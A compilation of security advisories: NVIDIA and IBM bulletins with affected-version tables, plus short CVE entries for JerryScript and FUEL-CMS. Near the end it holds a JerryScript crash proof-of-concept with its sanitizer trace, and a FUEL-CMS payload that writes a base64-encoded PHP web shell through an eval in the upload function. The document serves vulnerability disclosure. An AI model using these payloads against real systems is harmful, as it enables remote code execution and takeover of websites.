


NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in the nvdisasm binary file, where an attacker may cause a NULL pointer dereference by providing a user with a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.





**Details**

This section summarizes the potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors follow CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector and CWE**

CVE‑2023‑25523

NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in the nvdisasm binary file, where an attacker may cause a NULL pointer dereference by providing a user with a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.

3.3

AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L  
CWE-476

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends evaluating the risk to your specific configuration.

**Security Updates**

The following table lists the software products and versions affected, and the updated version available from nvidia.com that includes this security update.

Download the update from the CUDA Toolkit Downloads page to apply the security update.

**CVEs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

CVE‑2023‑25523

NVIDIA CUDA Toolkit

Linux, Windows

All versions prior to CUDA Toolkit v12.2

CUDA Toolkit v12.2

**Notes**

*   Earlier software releases of this product are also affected. If you are using an earlier release, upgrade to the latest release version.

**Acknowledgements**

NVIDIA thanks the following people for reporting these issues:

CVE‑2023‑25523: Jifan Xiao

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

June 29, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-25523: NVIDIA Support








NVIDIA DGX A100/A800 contains a vulnerability in SBIOS where an attacker may cause improper input validation by providing configuration information in an unexpected format.  A successful exploit of this vulnerability may lead to denial of service, information disclosure, and data tampering.









**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2023‑25521

The NVIDIA DGX A100 and A800 systems contain a vulnerability in SBIOS, where improper validation of an input parameter may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.

7.5

CWE-250  
AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE‑2023‑25522

The NVIDIA DGX A100 and A800 systems contain a vulnerability in SBIOS, where information that is provided in an unexpected format may cause improper validation of an input parameter, which may lead to denial of service, information disclosure, and data tampering.

7.5

CWE-20  
AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates**

The following tables list the NVIDIA systems affected, firmware versions affected, and the updated version that includes this security update.

To protect your system, download and install this firmware update through the NVIDIA Enterprise Support Portal.

**Note:** To get the updated BMC and SBIOS versions listed in the tables, upgrade to the NVIDIA DGX A100 Firmware Update Container Version 23.06.3. Firmware updates are available through the NVIDIA Enterprise Support Portal.

**Security Advisory CVE IDs Addressed by NVIDIA**

**CVE IDs Addressed**

**Hardware Platform**

**System**

**Affected Versions**

**Updated Version**

CVE‑2023‑25521

NVIDIA DGX

NVIDIA DGX A100  
NVIDIA DGX A800

All SBIOS versions prior to 1.21

1.21

CVE‑2023‑25522

NVIDIA DGX

NVIDIA DGX A100  
NVIDIA DGX A800

All SBIOS versions prior to 1.21

1.21

**Security Advisory CVE IDs Addressed by AMI**

**CVE IDs Addressed**

**Hardware Platform**

**System**

**Affected Versions**

**Updated Version**

CVE‑2022‑26872  
CVE‑2022‑40259  
CVE‑2022‑2827  
CVE‑2022‑40242

NVIDIA DGX

NVIDIA DGX A100  
NVIDIA DGX A800

All BMC versions prior to 00.20.04

00.20.04

CVE‑2021‑26316  
CVE‑2021‑39298  
CVE‑2021‑26402  
CVE‑2022‑23813  
CVE‑2022‑23814  
CVE‑2021‑26328

NVIDIA DGX

NVIDIA DGX A100  
NVIDIA DGX A800

All SBIOS versions prior to 1.21

1.21

**Security Vulnerabilities Reported by AMI**

The following table lists potential security vulnerabilities in some AMI MegaRAC SP-X baseboard management controllers that have been reported by AMI. These vulnerabilities may allow user enumeration, unauthorized access, or arbitrary code execution. The NVIDIA DGX-1, NVIDIA DGX-2, NVIDIA DGX Station, and NVIDIA DGX Station A100 systems are not vulnerable to these issues.

**CVE ID**

**Severity**

**Vendor**

CVE‑2022‑40259

Critical

AMI

CVE‑2022‑26872

High

AMI

CVE‑2022‑2827

High

AMI

CVE‑2021‑26316

High

AMI

CVE‑2021‑39298

High

AMI

CVE‑2021‑26402

High

AMI

CVE‑2022‑40242

Medium

AMI

CVE‑2022‑23813

Medium

AMI

CVE‑2022‑23814

Medium

AMI

CVE‑2021‑26328

Medium

AMI

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

June 30, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-25522: NVIDIA Support

IBM i 7.2, 7.3, 7.4, and 7.5 could allow a remote attacker to execute CL commands as QUSER, caused by an exploitation of DDM architecture.  IBM X-Force ID:  254036.

**Security Bulletin**

  

**Summary**

IBM i is vulnerable to a remote attacker executing CL commands due to an exploitation of DDM architecture as described in the vulnerability details section. IBM i has addressed the vulnerability in the DDM architecture as described in the remediation/fixes section.

**Vulnerability Details**

**CVEID:**   CVE-2023-30990  
**DESCRIPTION:**   IBM i could allow a remote attacker to execute CL commands as QUSER, caused by an exploitation of DDM architecture.  
CVSS Base score: 5.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/254036 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM i

7.5

IBM i

7.4

IBM i

7.3

IBM i

7.2

**Remediation/Fixes**

The issue can be fixed by applying a PTF to IBM i.  IBM i releases 7.5, 7.4, 7.3, and 7.2 will be fixed.

The IBM i PTF numbers for IBM i 5770-SS1 Base Operating System contain the fix for the vulnerability.

https://www.ibm.com/support/fixcentral

_Important note: IBM recommends that all users running unsupported versions of affected products upgrade to supported and fixed version of affected products._

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by Zoltan Panczel, Silent Signal.

**Change History**

30 Jun 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSB23CE","label":"IBM i 7.5 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SS9QQS","label":"IBM i 7.4 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.4.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG60","label":"IBM i"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0,7.4.0, 7.3.0, 7.2.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSTS2D","label":"IBM i 7.3 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.3.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSC5L9","label":"IBM i 7.2 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.2.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2023-30990: IBM i is vulnerable to an attacker executing CL commands due to an exploitation of DDM architecture (CVE-2023-30990)

Hero Qubo HCD01_02_V1.38_20220125 devices allow TELNET access with root privileges by default, without a password.

CVE-2023-22906


NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest OS may be able to control resources for which it is not authorized, which may lead to information disclosure and data tampering.



**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**NVIDIA GPU Display Driver**

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE-2022-34671

NVIDIA GPU Display Driver for Windows contains a vulnerability in the user-mode layer, where an unprivileged user can cause an out-of-bounds write, which may lead to code execution, information disclosure, and denial of service.

8.5

CWE: 787  
AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE‑2023‑25515

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where unexpected untrusted data is parsed, which may lead to code execution, denial of service, escalation of privileges, data tampering, or information disclosure.

7.8

CWE: 822  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2023‑25516

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where an unprivileged user can cause an integer overflow, which may lead to information disclosure and denial of service.

7.1

CWE: 190  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

**NVIDIA vGPU Software**

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2023‑25517

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest OS may be able to control resources for which it is not authorized, which may lead to information disclosure and data tampering.

7.1

CWE: 285  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates for NVIDIA GPU Display Driver****CVE IDs Addressed in Each Windows Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**Security Updates for NVIDIA GPU Windows Display Driver**

The following table lists the NVIDIA software products affected, Windows driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

GeForce

Windows

R535

All driver versions prior to 536.23

536.23

Windows 10 and 11

R470

All drivers versions prior to 474.44 for support of GeForce Kepler desktop

474.44

Windows 7 and 8._x_

R470

All driver versions prior to 474.44

474.44

Studio

Windows

R535

All driver versions

Available the week of June 29, 2023

NVIDIA RTX, Quadro, NVS

Windows

R535

All driver versions prior to 536.25

536.25

R525

All driver versions prior to 529.11

529.11

R470

All driver versions prior to 474.44

474.44

Tesla

Windows

R535

All driver versions prior to 536.25

536.25

R525

All driver versions prior to 529.11

529.11

R470

All driver versions prior to 474.44

474.44

R450

All driver versions prior to 454.23

454.23

**CVE IDs Addressed in Each Linux Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux driver branch.

**Linux Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE‑2023‑25515, CVE‑2023‑25516

**Security Updates for NVIDIA GPU Linux Display Driver**

The following table lists the NVIDIA software products affected, Linux driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

GeForce

Linux

R535

All driver versions prior to 535.54.03

535.54.03

R525

All driver versions prior to 525.125.06

525.125.06

R470

All driver versions prior to 470.199.02

470.199.02

NVIDIA RTX, Quadro, NVS

Linux

R535

All driver versions prior to 535.54.03

535.54.03

R525

All driver versions prior to 525.125.06

525.125.06

R470

All driver versions prior to 470.199.02

470.199.02

Tesla

Linux

R535

All driver versions prior to 535.54.03

535.54.03

R525

All driver versions prior to 525.125.06

525.125.06

R470

All driver versions prior to 470.199.02

470.199.02

R450

All driver versions prior to 450.248.02

450.248.02

**Notes**

*   Your computer hardware vendor may provide you with Windows GPU display driver versions including 536.19,531.87, 529.08, 574.44, and 454.23, which also contain the security updates.
*   The tables above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA vGPU Software****CVE IDs Addressed in Each Windows vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**CVE IDs Addressed in Each Linux vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux vGPU driver branch

**Linux Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE‑2023‑25516

**CVE IDs Addressed in Each vGPU Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each vGPU Manager driver branch

**vGPU Manager Driver Branch**

**CVE IDs Addressed**

R535, R525

CVE‑2023‑25516, CVE‑2023‑25517

R470, R450

CVE‑2023‑25516

**Affected Products, Affected Versions, and Updated Versions**

The following table lists NVIDIA software products affected, versions affected, and the updated version that includes this security update.

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

Updated Version

**vGPU Software**

**Driver**

vGPU Software

Driver

CVE-2022-34671  
CVE‑2023‑25515

vGPU software (guest driver)

Windows

All versions prior to and including 15.2

528.89

15.3

529.11

All versions prior to and including 13.7

474.30

13.8

474.44

All versions prior to and including 11.12

454.14

11.13

454.23

CVE‑2023‑25516

vGPU software (guest driver)

Linux

All versions prior to and including 15.2

525.105.17

15.3

525.125.06

All versions prior to and including 13.7

470.182.03

13.8

470.199.02

All versions prior to and including 11.12

450.236.01

11.13

450.248.02

CVE‑2023‑25516  
CVE‑2023‑25517

vGPU software (Virtual GPU Manager)

Citrix Hypervisor, VMware vSphere, Red Hat Enterprise Linux KVM

All versions prior to and including 15.2

525.105.14

15.3

525.125.03

All versions prior to and including 13.7

470.182.02

13.8

470.199.03

All versions prior to and including 11.12

450.236.03

11.13

450.248.03

**Notes**

*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA Cloud Gaming****CVE IDs Addressed in Each Windows Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**CVE IDs Addressed in Each Linux Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux Cloud Gaming driver branch

**Linux Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**CVE IDs Addressed in Each Cloud Gaming Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each Cloud Gaming Manager driver branch

**vGPU Manager Driver Branch**

**CVE IDs Addressed**

R535, R525

CVE‑2023‑25516, CVE‑2023‑25517

R470, R450

CVE‑2023‑25516

The following table lists the NVIDIA software products affected, versions affected, and the updated version that includes this security update.

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

**Cloud Gaming Software**

**Driver**

**Cloud Gaming Software**

**Driver**

CVE-2022-34671  
CVE‑2023‑25515

NVIDIA Cloud Gaming (guest driver)

Windows

All versions prior to and including May 2023 release

All versions prior to 531.79

June 2023 release

536.25

CVE‑2023‑25516

NVIDIA Cloud Gaming (guest driver)

Linux

All versions prior to and including May 2023 release

All versions prior to 530.51

June 2023 release

535.54.03

CVE‑2023‑25516  
CVE‑2023‑25517

NVIDIA Cloud Gaming (Virtual GPU Manager)

Red Hat Enterprise Linux KVM

All versions prior to and including May 2023 release

All versions prior to 530.51

June 2023 release

535.54.06

**Acknowledgements**

NVIDIA thanks the following people for reporting these issues:

CVE-2022-34671: Piotr Bania - Cisco Talos

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

June 26, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Frequently Asked Questions (FAQs)**

How do I determine which NVIDIA display driver version is currently installed on my PC?

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-25517: NVIDIA Support

An issue in Jerrscript- project Jerryscrip v. 2.3.0 allows a remote attacker to execute arbitrary code via the ecma_builtin_array_prototype_object_slice parameter.

    a = []
    for(var i=0; i<100; i++) a.push(i)
    a.slice(0, {valueOf: function(){a.length=0; return 100;}})
    

    ==34465==ERROR: AddressSanitizer: SEGV on unknown address 0x000173d7b4e0 (pc 0x00010e47486f bp 0x7ffee179a130 sp 0x7ffee179a130 T0)
    ==34465==The signal is caused by a READ memory access.
        #0 0x10e47486e in ecma_ref_ecma_string (jerry:x86_64+0x10000f86e)
        #1 0x10e478e93 in ecma_copy_value (jerry:x86_64+0x100013e93)
        #2 0x10e47ef83 in ecma_builtin_array_prototype_dispatch_routine (jerry:x86_64+0x100019f83)
        #3 0x10e496a37 in ecma_builtin_dispatch_call (jerry:x86_64+0x100031a37)
        #4 0x10e4d9672 in vm_execute (jerry:x86_64+0x100074672)
        #5 0x10e4d910c in vm_run (jerry:x86_64+0x10007410c)
        #6 0x10e46a81f in jerry_run (jerry:x86_64+0x10000581f)
        #7 0x10e467e49 in main (jerry:x86_64+0x100002e49)
        #8 0x7fff72b5c7fc in start (libdyld.dylib:x86_64+0x1a7fc)
    
    ==34465==Register values:
    rax = 0x000000002e7af69c  rbx = 0x0000000065737361  rcx = 0x000010002e7af600  rdx = 0x0000100000000000
    rdi = 0x0000000173d7b4e0  rsi = 0x0000000000000000  rbp = 0x00007ffee179a130  rsp = 0x00007ffee179a130
     r8 = 0x0000100000000000   r9 = 0x00000000000006e8  r10 = 0x000000010e644670  r11 = 0x00007fff72cccf00
    r12 = 0x000000010e64470c  r13 = 0x000000010e6441bc  r14 = 0x0000100000000000  r15 = 0x000000000000000f
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (jerry:x86_64+0x10000f86e) in ecma_ref_ecma_string
    ==34465==ABORTING
    [1]    34465 abort      ./build/bin/jerry

CVE-2020-22597: SEGV on ecma_builtin_array_prototype_object_slice · Issue #3637 · jerryscript-project/jerryscript

File Upload vulnerability in FUEL-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted .php file to the upload parameter in the navigation function.

upload function:  
  
$This-&gt; fuel-&gt; navigation-&gt; upload ($ params) was called

    	if (empty($file))
    	{
    		return FALSE;
    	}
    
    	// strip any php tags
    	$file = str_replace('<?php', '', $file);
    	
    	// run xss_clean on it 
    	$file = xss_clean($file);
    	
    	// now evaluate the string to get the nav array
    	@eval($file);`
    

Only uploaded code <? Php tags replaced with spaces And filtered the xss tags.  
Then executed the code @eval ($ file);  
So we can construct php code to write webshell to web directory.  
code:  

file_put_contents("aaaaaa.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWydpZCddKTs/Pg=="));  
Because the <? Php tag is filtered, we use base64 to encode the command execution code  
Then upload  
  
Although the error is prompted, our code has been executed, and we can see the generated files on the web and directories.

CVE-2020-22153: Code execution in navigation/upload · Issue #553 · daylightstudio/FUEL-CMS

Cross Site Scripting vulnerability in daylight studio FUEL- CMS v.1.4.6 allows a remote attacker to execute arbitrary code via the page title, meta description and meta keywords of the pages function.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-22152: XSS in pages · Issue #552 · daylightstudio/FUEL-CMS

Permissions vulnerability in Fuel-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted zip file to the assests parameter of the upload function.

CVE-2020-22151: getshell in assets · Issue #551 · daylightstudio/FUEL-CMS

Cross Site Request Forgery vulnerability in ZZCMS v.2023 alows a remote attacker to gain privileges via the add function in adminlist.php.

Source

CVE